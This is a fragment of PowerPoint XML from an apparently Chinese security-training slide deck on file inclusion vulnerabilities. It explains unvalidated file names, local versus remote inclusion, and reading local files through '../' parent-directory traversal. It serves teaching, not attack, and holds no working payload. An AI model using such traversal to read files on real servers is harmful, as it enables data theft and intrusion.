            </a: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文件包含漏洞的产生原因是在通过引入文件时，由于传入的文件名没有经过合理的校验，或者校检被绕过，从而操作了预想之外的文件，就可能导致意外的文件泄露甚至恶意的代码注入。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2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文件包含漏洞原理解析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语言所提供的文件包含功能太强大、太灵活，所以大部门文件包含的漏洞都出现在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的程序中。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当被包含的文件在服务器本地时，就形成的本地文件包含漏洞。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当被包含的文件在远程服务器时，就形成的远程文件包含漏洞。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1"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98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42016252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1198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文件包含示例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通过文件包含读取本地文件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190" y="2186230"/>
            <a:ext cx="6647619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文件包含示例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通过文件包含读取本地文件，“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../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”表示父目录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43" y="1683585"/>
            <a:ext cx="7485714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22214530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6424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647</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>全屏显示(4:3)</PresentationFormat>
  <Paragraphs>104</Paragraphs>
  <Slides>18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9.文件包含漏洞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sangfor</dc:creator>
  <cp:lastModifiedBy>zx</cp:lastModifiedBy>
  <cp:revision>502</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-11-09T06:25:36Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-07-23T03:32:30Z</dcterms:modified>
</cp:coreProperties>
</file>